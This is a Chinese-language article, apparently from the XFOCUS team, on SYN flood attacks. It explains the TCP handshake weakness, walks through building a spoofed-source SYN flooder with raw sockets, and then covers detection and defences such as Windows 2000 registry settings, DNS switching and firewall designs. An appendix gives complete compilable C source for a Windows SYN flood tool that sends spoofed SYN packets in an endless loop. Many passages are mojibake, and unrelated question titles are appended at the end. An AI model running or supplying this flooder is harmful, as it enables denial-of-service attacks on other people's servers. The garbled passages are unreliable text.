TCP连接完成。 以上的连接过程在TCP协议中被称为三次握手(Three-way Handshake)。 问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN
报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK
报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK
给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN
Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2
分钟);一个用户出现异常导致服务器的一个线程等待1
分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将?
宋ひ桓龇浅4蟮陌肓恿斜矶姆浅6嗟淖试?---数以万计的半连接,即使是简单
的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN
+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃-
--即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP
连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正?
?突У慕嵌瓤蠢矗衿魇ハ煊Γ庵智榭鑫颐浅谱鳎悍衿鞫耸艿搅薙YN Flood
攻击(SYN洪水攻击)。 从防御角度来说,有几种简单的解决方法,第一种是缩短SYN Timeout时间,由于SYN
Flood攻击的效果取决于服务器上保持的SYN半连接数,这个值=SYN攻击的频度 x SYN
Timeout,所以通过缩短从接收到SYN
报文到确定这个报文无效并丢弃改连接的时间,例如设置为20秒以下(过低的SYN
Timeout设置可能会影响客户的正常访问),可以成倍的降低服务器的负荷。 第二种方法是设置SYN Cookie,就是给每一个请求连接的IP地址分配一个Cookie
,如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击,以后从这个IP
地址来的包会被一概丢弃。 可是上述的两种方法只能对付比较原始的SYN Flood攻击,缩短SYN Timeout
时间仅在对方攻击频度不高的情况下生效,SYN Cookie更依赖于对方使用真实的IP
地址,如果攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP
报文中的源地址,以上的方法将毫无用武之地。 第二部份 SYN Flooder源码解读 下面我们来分析SYN Flooder的程序实现。首先,我们来看一下TCP报文的格式: 0 1 2 3 4 5 6 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IP首部 | TCP首部 | TCP数据段 |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图一 TCP报文结构 如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP
首部与不定长的数据段,(实际操作时可能会有可选的IP选项,这种情况下TCP
首部向后顺延)由于我们只是发送一个SYN信号,并不传递任何数据,所以TCP
数据段为空。TCP首部的数据结构为: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位源端口号 | 十六位目标端口号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位序列号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位确认号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 四位 | |U|A|P|R|S|F| | | 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 | | 长度 | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位校验和 | 十六位紧急指针 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 选项(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 数据(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图二 TCP首部结构 根据TCP报文格式,我们定义一个结构TCP_HEADER用来存放TCP首部:typedef struct _tcphdr { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度+6位保留字中的4位 unsigned char th_flag; //2位保留字+6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER;通过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010
)我们能制造一个SYN的TCP报文,通过大量发送这个报文可以实现SYN Flood
的效果。但是为了进行IP欺骗从而隐藏自己,也为了躲避服务器的SYN Cookie
检查,还需要直接对IP首部进行操作:0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 版本 | 长度 | 八位服务类型 | 十六位总长度 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位标识 | 标志| 十三位片偏移 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 八位生存时间 | 八位协议 | 十六位首部校验和 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位源IP地址 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位目的IP地址 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 选项(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 数据 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图三 IP首部结构同样定义一个IP_HEADER来存放IP首部typedef struct _iphdr{ unsigned char h_verlen; //4位首部长度+4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议号(TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址}IP_HEADER;然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,
WSA_FLAG_OVERLAPPED)); 建立一个原始套接口,由于我们的IP源地址是伪造的,所以不能指望系统帮我们计算
IP校验和,我们得在在setsockopt中设置IP_HDRINCL告诉系统自己填充IP
首部并自己计算校验和: flag=TRUE; setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));IP校验和的计算方法是:首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),
然后计算整个IP首部(包括选项)的二进制反码的和,一个标准的校验和函数如下所示:USHORT checksum(USHORT *buffer, int size){ unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum);}这个函数并没有经过任何的优化,由于校验和函数是TCP/IP
协议中被调用最多函数之一,所以一般说来,在实现TCP/IP
栈时,会根据操作系统对校验和函数进行优化。TCP首部检验和与IP首部校验和的计算方法相同,在程序中使用同一个函数来计算。需要注意的是,由于TCP首部中不包含源地址与目标地址等信息,为了保证TCP
校验的有效性,在进行TCP校验和的计算时,需要增加一个TCP
伪首部的校验和,定义如下:struct { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; //置空 char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header;然后我们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和:memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(
tcp_header));计算IP校验和的时候不需要包括TCP伪首部:memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(
tcp_header)); 再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了: memcpy(SendBuf,&ip_header,sizeof(ip_header)); sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(
DestAddr)); 因为整个TCP
报文中的所有部分都是我们自己写入的(操作系统不会做任何干涉),所以我们可以在IP
首部中放置随机的源IP地址,如果伪造的源IP地址确实有人使用,他在接收到服务器的
SYN+ACK报文后会发送一个RST报文(标志位为00000100
),通知服务器端不需要等待一个无效的连接,可是如果这个伪造IP
并没有绑定在任何的主机上,不会有任何设备去通知主机该连接是无效的(这正是TCP
协议的缺陷),主机将不断重试直到SYN Timeout
时间后才能丢弃这个无效的半连接。所以当攻击者使用主机分布很稀疏的IP
地址段进行伪装IP的SYN Flood
攻击时,服务器主机承受的负荷会相当的高,根据测试,一台PIII 550MHz+128MB+
100Mbps的机器使用经过初步优化的SYN Flooder程序可以以16,000包/秒的速度发送TCP
SYN报文,这样的攻击力已经足以拖垮大部分WEB服务器了。 稍微动动脑筋我们就会发现,想对SYN Flooder
程序进行优化是很简单的,从程序构架来看,攻击时循环内的代码主要是进行校验和计算?
牖撼迩奶畛洌话愕乃悸肥翘岣咝Q楹图扑愕乃俣龋疑踔良没惚啻氡嘈吹男Q?
和函数,实际上,有另外一个变通的方法可以轻松实现优化而又不需要高深的编程技巧和?
е叮ɡ鲜邓蛋桑沂П冉喜?P),我们仔细研究了两个不同源地址的TCP SYN
报文后发现,两个报文的大部分字段相同(比如目的地址、协议等等),只有源地址和校?
楹筒煌ㄈ绻艘危炊丝谝部梢杂斜浠遣⒉挥跋煳颐撬惴ㄓ呕乃悸罚?
果我们事先计算好大量的源地址与校验和的对应关系表(如果其他的字段有变化也可以加?
胝飧霰恚燃扑阃瓯狭斯セ鞒绦蚓椭恍枰ゴ康淖楹匣撼迩⒎⑺停ㄓ弥刚肜粗苯硬僮?
缓冲区的特定位置,从事先计算好的对应关系表中读出数据,替换缓冲区相应字段),这?
旨虻サ墓ぷ魍耆【鲇谙低撤⑺虸P
包的速度,与程序的效率没有任何关系,这样,即使是CPU
主频较低的主机也能快速的发送大量TCP SYN
攻击包。如果考虑到缓冲区拼接的时间,甚至可以定义一个很大的缓冲区数组,填充完毕?
笤俜⑺停ǔジ庵址椒ㄏ肓艘桓龊芴械谋扔鳎夯鸺谧暗淙缓苈且坏┡诘?
膛了以后就可以连续猛烈地发射了:)。 第三部分 SYN Flood攻击的监测与防御初探 对于SYN Flood
攻击,目前尚没有很好的监测和防御方法,不过如果系统管理员熟悉攻击方法和系统架构?
ü幌盗械纳瓒ǎ材艽右欢ǔ潭壬辖档捅还セ飨低车母汉桑跚岣好娴挠跋臁#ㄕ庹?
是我撰写本文的主要目的) 一般来说,如果一个系统(或主机)负荷突然升高甚至失去响应,使用Netstat
命令能看到大量SYN_RCVD的半连接(数量>500或占总连接数的10
%以上),可以认定,这个系统(或主机)遭到了SYN Flood攻击。 遭到SYN Flood攻击后,首先要做的是取证,通过Netstat –n –p tcp >resault.
txt记录目前所有TCP连接状态是必要的,如果有嗅探器,或者TcpDump之类的工具,记录
TCP SYN报文的所有细节也有助于以后追查和防御,需要记录的字段有:源地址、IP
首部中的标识、TCP首部中的序列号、TTL
值等,这些信息虽然很可能是攻击者伪造的,但是用来分析攻击者的心理状态和攻击程序?
膊晃薨镏L乇鹗荰TL值,如果大量的攻击包似乎来自不同的IP但是TTL
值却相同,我们往往能推断出攻击者与我们之间的路由器距离,至少也可以通过过滤特定
TTL值的报文降低被攻击系统的负荷(在这种情况下TTL
值与攻击报文不同的用户就可以恢复正常访问) 前面曾经提到可以通过缩短SYN Timeout时间和设置SYN Cookie来进行SYN
攻击保护,对于Win2000系统,还可以通过修改注册表降低SYN Flood
的危害,在注册表中作如下改动:首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Tcpip\Parameters 增加一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2
,这个值决定了系统受到SYN攻击时采取的保护措施,包括减少系统SYN+ACK
的重试的次数等,默认值是0(没有任何保护措施),推荐设置是2; 增加一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF
,这个值是系统允许同时打开的半连接,默认情况下WIN2K PRO和SERVER是100,
ADVANCED SERVER是500,这个值很难确定,取决于服务器TCP
负荷的状况和可能受到的攻击强度,具体的值需要经过试验才能决定。 增加一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80-0xFFFF
,默认情况下WIN2K PRO和SERVER是80,ADVANCED SERVER是400
,这个值决定了在什么情况下系统会打开SYN攻击保护。 我们来分析一下Win2000的SYN攻击保护机制:正常情况下,Win2K对TCP
连接的三次握手有一个常规的设置,包括SYN Timeout时间、SYN-ACK的重试次数和SYN
报文从路由器到系统再到Winsock
的延时等,这个常规设置是针对系统性能进行优化的(安全和性能往往相互矛盾)所以可?
愿没峁┓奖憧旖莸姆瘢灰坏┓衿魇艿焦セ鳎琒YN半连接的数量超过
TcpMaxHalfOpenRetried的设置,系统会认为自己受到了SYN Flood攻击,此时设置在
SynAttackProtect键值中的选项开始作用,SYN Timeout时间被减短,SYN-ACK
的重试次数减少,系统也会自动对缓冲区中的报文进行延时,避免对TCP/IP
堆栈造成过大的冲击,力图将攻击危害减到最低;如果攻击强度不断增大,超过了
TcpMaxHalfOpen
值,此时系统已经不能提供正常的服务了,更重要的是保证系统不会崩溃,所以系统将会?
魏纬鯰cpMaxHalfOpen值范围的SYN
报文(应该是使用随机丢包策略),保证系统的稳定性。 所以,对于需要进行SYN
攻击保护的系统,我们可以测试/预测一下访问峰值时期的半连接打开量,以其作为参考设
定TcpMaxHalfOpenRetried的值(保留一定的余量),然后再以TcpMaxHalfOpenRetried的
1.25倍作为TcpMaxHalfOpen值,这样可以最大限度地发挥WIN2K自身的SYN攻击保护机制。 通过设置注册表防御SYN Flood
攻击,采用的是“挨打”的策略,无论系统如何强大,始终不能光靠挨打支撑下去,除了?
ご蛑猓巴巳谩币彩且恢直冉嫌行У姆椒ā? 退让策略是基于SYN Flood攻击代码的一个缺陷,我们重新来分析一下SYN Flood
攻击者的流程:SYN Flood程序有两种攻击方式,基于IP
的和基于域名的,前者是攻击者自己进行域名解析并将IP
地址传递给攻击程序,后者是攻击程序自动进行域名解析,但是它们有一点是相同的,就?
且坏┕セ骺迹换嵩俳杏蛎馕觯颐堑那腥氲阏钦饫铮杭偕枰惶ǚ衿髟谑艿?
SYN Flood攻击后迅速更换自己的IP地址,那么攻击者仍在不断攻击的只是一个空的IP
地址,并没有任何主机,而防御方只要将DNS解析更改到新的IP
地址就能在很短的时间内(取决于DNS
的刷新时间)恢复用户通过域名进行的正常访问。为了迷惑攻击者,我们甚至可以放置一?
ā拔狈衿魅霉セ髡呗阌诠セ鞯摹靶Ч保ㄓ捎贒NS
缓冲的原因,只要攻击者的浏览器不重起,他访问的仍然是原先的IP地址)。 同样的原因,在众多的负载均衡架构中,基于DNS解析的负载均衡本身就拥有对SYN
Flood的免疫力,基于DNS解析的负载均衡能将用户的请求分配到不同IP
的服务器主机上,攻击者攻击的永远只是其中一台服务器,虽然说攻击者也能不断去进行
DNS请求从而打破这种“退让”策略,但是一来这样增加了攻击者的成本,二来过多的DNS
请求可以帮助我们追查攻击者的真正踪迹(DNS请求不同于SYN
攻击,是需要返回数据的,所以很难进行IP伪装)。 对于防火墙来说,防御SYN Flood
攻击的方法取决于防火墙工作的基本原理,一般说来,防火墙可以工作在TCP层之上或IP
层之下,工作在TCP
层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系如下图所?
荆? 外部TCP连接 内部TCP连接 [客户机] =================>[防火墙] =================>[服务器] 如上图所示,客户机与服务器之间并没有真正的TCP
连接,客户机与服务器之间的所有数据交换都是通过防火墙代理的,外部的DNS
解析也同样指向防火墙,所以如果网站被攻击,真正受到攻击的是防火墙,这种防火墙的?
诺闶俏榷ㄐ院茫勾蚧髂芰η浚且蛭械腡CP
报文都需要经过防火墙转发,所以效率比较低由于客户机并不直接与服务器建立连接,在
TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP
连接,所以攻击者无法越过防火墙直接攻击后台服务器,只要防火墙本身做的足够强壮,?
庵旨芄箍梢缘挚瓜嗟鼻慷鹊腟YN Flood攻击。但是由于防火墙实际建立的TCP
连接数为用户连接数的两倍(防火墙两端都需要建立TCP
连接),同时又代理了所有的来自客户端的TCP
请求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,所以这种架构并不?
苁视糜诖笮屯尽#ㄎ腋芯酰杂谡庋姆阑鹎郊芄梗褂肨CP_STATE
攻击估计会相当有效:) 工作在IP层或IP
层之下的防火墙(路由型防火墙)工作原理有所不同,它与服务器、客户机的关系如下图?
荆?[防火墙] 数据包修改转发 [客户机]========|=======================>[服务器] TCP连接 客户机直接与服务器进行TCP
连接,防火墙起的是路由器的作用,它截获所有通过的包并进行过滤,通过过滤的包被转?
⒏衿鳎獠康腄NS解析也直接指向服务器,这种防火墙的优点是效率高,可以适应
100Mbps-1Gbps
的流量,但是这种防火墙如果配置不当,不仅可以让攻击者越过防火墙直接攻击内部服务?
鳎踔劣锌赡芊糯蠊セ鞯那慷龋贾抡鱿低潮览!?
在这两种基本模型之外,有一种新的防火墙模型,我个人认为还是比较巧妙的,它集中了?
街址阑鹎降挠攀疲庵址阑鹎降墓ぷ髟砣缦滤荆?第一阶段,客户机请求与防火墙建立连接: SYN SYN+ACK ACK [客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]-
-- >[防火墙] 第二阶段,防火墙伪装成客户机与后台的服务器建立连接 [防火墙]< =========== >[服务器] TCP连接 第三阶段,之后所有从客户机来的TCP报文防火墙都直接转发给后台的服务器 防火墙转发 [客户机]< ======|======= >[服务器] TCP连接 这种结构吸取了上两种防火墙的优点,既能完全控制所有的SYN
报文,又不需要对所有的TCP数据报文进行代理,是一种两全其美的方法。 近来,国外和国内的一些防火墙厂商开始研究带宽控制技术,如果能真正做到严格控制、?
峙浯恚湍芎艽蟪潭壬戏烙蠖嗍木芫窆セ鳎颐腔故鞘媚恳源伞? 附录:Win2000下的SYN Flood程序改编自Linux下Zakath编写的SYN Flooder编译环境:VC++6.0,编译时需要包含ws2_32.lib//////////////////////////////////////////////////////////////////////////// //// SYN Flooder For Win2K by Shotgun //// //// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //// THANX Lion Hook FOR PROGRAM OPTIMIZATION //// //// Released: [2001.4] //// Author: [Shotgun] //// Homepage: //// [http://IT.Xici.Net] //// [http://WWW.Patching.Net] //// ////////////////////////////////////////////////////////////////////////////#include
类网段#define STATUS_FAILED 0xFFFF //错误返回值 typedef struct _iphdr //定义IP首部{ unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址}IP_HEADER; struct //定义TCP伪首部{ unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header; typedef struct _tcphdr //定义TCP首部{ USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER; //CheckSum:计算校验和的子函数USHORT checksum(USHORT *buffer, int size){ unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum);} // SynFlood主函数int main(){ int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //初始化SOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)
);if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //设置IP_HDRINCL以自己填充IP首部 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(
int));If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //设置发送超时 ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,
sizeof(TimeOut));if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError(
)); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //填充IP首部 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));//高四位IP版本号,低四位首部长度 ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//16位总长度(字节) ip_header.ident=1
; //16位标识 ip_header.frag_and_flags=0
; //3位标志位 ip_header.ttl=128
; //8位生存时间TTL ip_header.proto=IPPROTO_TCP;
//8位协议(TCP,UDP…) ip_header.checksum=0
; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ)
; //32位源IP地址 ip_header.destIP=inet_addr(SYN_DEST_IP)
; //32位目的IP地址 //填充TCP首部 tcp_header.th_sport=htons(7000);
//源端口号 tcp_header.th_dport=htons(8080);
//目的端口号 tcp_header.th_seq=htonl(SEQ+SendSEQ)
; //SYN序列号 tcp_header.th_ack=0;
//ACK序列号置为0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0)
; //TCP长度和保留位 tcp_header.th_flag=2
; //SYN 标志 tcp_header.th_win=htons(16384)
; //窗口大小 tcp_header.th_urp=0;
//偏移 tcp_header.th_sum=0;
//校验和 //填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr=ip_header.sourceIP
; //源地址 psd_header.daddr=ip_header.destIP
; //目的地址 psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP
; //协议类型 psd_header.tcpl=htons(sizeof(tcp_header))
; //TCP首部长度 while(1) { //每发送10,240个报文输出一个标示符 printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1
; //序列号循环 //更改IP首部 ip_header.checksum=0
; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ)
; //32位源IP地址 //更改TCP首部 tcp_header.th_seq=htonl(SEQ+SendSEQ)
; //SYN序列号 tcp_header.th_sum=0;
//校验和 //更改TCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //计算TCP校验和,计算校验和时需要包括TCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(
tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header
)+sizeof(tcp_header)); //计算IP校验和 memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header
)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //填充发送缓冲区 memcpy(SendBuf,&ip_header,sizeof(ip_header)); //发送TCP报文 ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr));if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0;} Copyright ? 1998-2003 XFOCUS Team. All Rights Reserved
syn flood攻击服务器
受到SYN flood 攻击怎么办?
SYN flood 攻击的问题(说说下面的是什么意思?
tcp syn flood攻击怎么防范?
紧急,遭受syn flood攻击,高手帮忙
我的电脑受到SYN flood攻击,被我的Mcafee防火墙给block了,不知道syn flood对我的电脑有没有造成影响?
TCP SYN FLOOD攻击需要打什么补丁?
被syn flood攻击,高手帮忙,急急急
昨天晚上被用syn flood攻击,高手帮忙!!!
如何反击SYN Flood入侵
TCP SYN FLOOD这是什么病毒?
ICMP-FLOOD UDP-FLOOD TCP-SYN-FLOOD 请问这个词是什意思?
怎么样防御那个DDOS的攻击?
关于卡巴网络攻击的防御
魔兽争霸的攻击与防御关系
有关WMI的攻击与防御
怎样防御网络攻击?
如何防御网络攻击
如何防御流星攻击?
计算机硬件及基本原理
我的电脑经常被攻击,如何防御?
关与1433漏洞 的利用 攻击和防御
这两天频繁的有网络攻击,被卡巴斯基防御
混乱军团的辅助使用不了,如增加攻击,防御